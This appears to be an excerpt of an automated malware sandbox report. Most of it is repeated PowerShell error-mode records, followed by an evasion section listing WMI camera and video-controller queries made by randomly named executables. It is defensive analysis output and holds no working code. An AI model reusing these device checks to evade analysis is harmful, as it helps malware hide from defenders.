                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Memory allocated: 1A90000 memory reserve | memory write watch
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Memory allocated: 1B520000 memory reserve | memory write watch
Source: C:\Recovery\uAsLgsGzSk.exe Memory allocated: FB0000 memory reserve | memory write watch
Source: C:\Recovery\uAsLgsGzSk.exe Memory allocated: 1A9A0000 memory reserve | memory write watch
